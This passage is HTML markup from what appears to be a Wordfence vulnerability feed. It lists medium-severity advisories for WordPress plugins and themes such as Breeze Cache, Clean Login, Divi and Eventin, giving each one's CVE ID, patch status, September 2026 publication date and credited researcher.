<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee2d7d01-da87-43b4-8d2b-2c9eef3c80e6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1c3b0fe6-796b-41c7-b989-439081be181f" target="_blank" rel="noopener">Bread &lt;= 2.9.12 &#8211; Missing Authorization to Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4792" target="_blank" rel="noopener noreferrer">							CVE-2026-4792						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bread" target="_blank" rel="noopener">Bread</a> <span class="wfvr-software-slug">[bread]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1c3b0fe6-796b-41c7-b989-439081be181f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c4d2fd2-84e1-4da8-b969-7715315c2eb9" target="_blank" rel="noopener">Breeze Cache &lt;= 2.5.14 &#8211; Unauthenticated Cache Poisoning</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-79713" target="_blank" rel="noopener noreferrer">							CVE-2026-79713						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breeze" target="_blank" rel="noopener">Breeze Cache</a> <span class="wfvr-software-slug">[breeze]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amity-gilmour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c9bdb8257ff6271832223102c3f02d69.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c9bdb8257ff6271832223102c3f02d69"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amity-gilmour" target="_blank" rel="noopener">Amity Gilmour</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c4d2fd2-84e1-4da8-b969-7715315c2eb9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da153e10-f5fd-4d68-99b0-7ae65ab347f6" target="_blank" rel="noopener">Clean Login &lt;= 1.18 &#8211; Unauthenticated Account Registration</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90976" target="_blank" rel="noopener noreferrer">							CVE-2026-90976						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clean-login" target="_blank" rel="noopener">Clean Login</a> <span class="wfvr-software-slug">[clean-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da153e10-f5fd-4d68-99b0-7ae65ab347f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20c92582-311e-45f9-8bbe-00c87d7e5656" target="_blank" rel="noopener">Clean Login &lt;= 1.18 &#8211; Unauthenticated CAPTCHA Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90977" target="_blank" rel="noopener noreferrer">							CVE-2026-90977						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clean-login" target="_blank" rel="noopener">Clean Login</a> <span class="wfvr-software-slug">[clean-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arthur-morgan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9d5a6e35f43bcf689368d3af692fc7b2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9d5a6e35f43bcf689368d3af692fc7b2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arthur-morgan" target="_blank" rel="noopener">Arthur Morgan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20c92582-311e-45f9-8bbe-00c87d7e5656" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d808f8-07e7-4dcc-8a64-b0dfd6dbec27" target="_blank" rel="noopener">Design Scuole Italia &lt;= 2.17.3 &#8211;  Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87792" target="_blank" rel="noopener noreferrer">							CVE-2026-87792						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-87791" target="_blank" rel="noopener">design-scuole-wordpress-theme</a> <span class="wfvr-software-slug">[design-scuole-wordpress-theme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d808f8-07e7-4dcc-8a64-b0dfd6dbec27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79a2fa3b-f9eb-49d8-97be-3a81d1b69c2e" target="_blank" rel="noopener">Divi 5.0 &#8211; 5.11.1 &#8211; Missing Authorization to Unauthenticated Arbitrary Registered Shortcode Execution via &#8216;content&#8217; Parameter via Shortcode Module REST Endpoint</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91707" target="_blank" rel="noopener noreferrer">							CVE-2026-91707						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/Divi" target="_blank" rel="noopener">Divi</a> <span class="wfvr-software-slug">[Divi]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79a2fa3b-f9eb-49d8-97be-3a81d1b69c2e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/06871a2f-5d1d-4e40-86c5-dd6620555380" target="_blank" rel="noopener">Easy Appointments &lt;= 4.0.2.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87965" target="_blank" rel="noopener noreferrer">							CVE-2026-87965						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79ed370a05dae7cb22b4e00d79829131.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79ed370a05dae7cb22b4e00d79829131"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener">Morato Antoine</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/06871a2f-5d1d-4e40-86c5-dd6620555380" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88e10fb7-df45-460a-92fa-7d1734dd7fa6" target="_blank" rel="noopener">Easy Appointments 4.0 &#8211; 4.0.2.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87966" target="_blank" rel="noopener noreferrer">							CVE-2026-87966						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/blast" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aec5180695004785c7b14644035d8482.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aec5180695004785c7b14644035d8482"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/blast" target="_blank" rel="noopener">blast</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88e10fb7-df45-460a-92fa-7d1734dd7fa6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56cdced2-74c5-4b90-a26f-0ad0977a912c" target="_blank" rel="noopener">Easy Form Builder 4.0.0 &#8211; 4.1.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85123" target="_blank" rel="noopener noreferrer">							CVE-2026-85123						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[easy-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56cdced2-74c5-4b90-a26f-0ad0977a912c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e77c433-ed79-4f43-a2b0-9bfee895d4b6" target="_blank" rel="noopener">Easy Invoice – Invoice Generator, PDF Quotes &amp; Payments &lt;= 2.3.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66676" target="_blank" rel="noopener noreferrer">							CVE-2026-66676						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-invoice" target="_blank" rel="noopener">Easy Invoice – Invoice Generator, PDF Quotes &amp; Payments</a> <span class="wfvr-software-slug">[easy-invoice]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rahul-yadav" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2c1a583af8cd2aa13e2d25605e8e1ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c1a583af8cd2aa13e2d25605e8e1ed9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rahul-yadav" target="_blank" rel="noopener">Rahul Yadav</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e77c433-ed79-4f43-a2b0-9bfee895d4b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/278ae6a0-7a94-48a8-a488-146e0d477dbb" target="_blank" rel="noopener">EduAdmin Booking &lt;= 5.4.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62101" target="_blank" rel="noopener noreferrer">							CVE-2026-62101						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eduadmin-booking" target="_blank" rel="noopener">EduAdmin Booking</a> <span class="wfvr-software-slug">[eduadmin-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/henise" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26ce90113d4042786e58539c132e02bd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26ce90113d4042786e58539c132e02bd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/henise" target="_blank" rel="noopener">henise</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/278ae6a0-7a94-48a8-a488-146e0d477dbb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47bf51eb-829d-433e-82c2-71dc09a9cb4d" target="_blank" rel="noopener">Event Booking Manager for WooCommerce &lt;= 5.3.7 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91008" target="_blank" rel="noopener noreferrer">							CVE-2026-91008						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47bf51eb-829d-433e-82c2-71dc09a9cb4d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/021b755f-ebe9-450e-b829-d94f7228990d" target="_blank" rel="noopener">Eventin &lt;= 4.1.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84907" target="_blank" rel="noopener noreferrer">							CVE-2026-84907						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/021b755f-ebe9-450e-b829-d94f7228990d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cbeff9a1-98e6-467b-83d0-416fdee2a8bf" target="_blank" rel="noopener">Eventin &lt;= 4.1.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77702" target="_blank" rel="noopener noreferrer">							CVE-2026-77702						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cbeff9a1-98e6-467b-83d0-416fdee2a8bf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
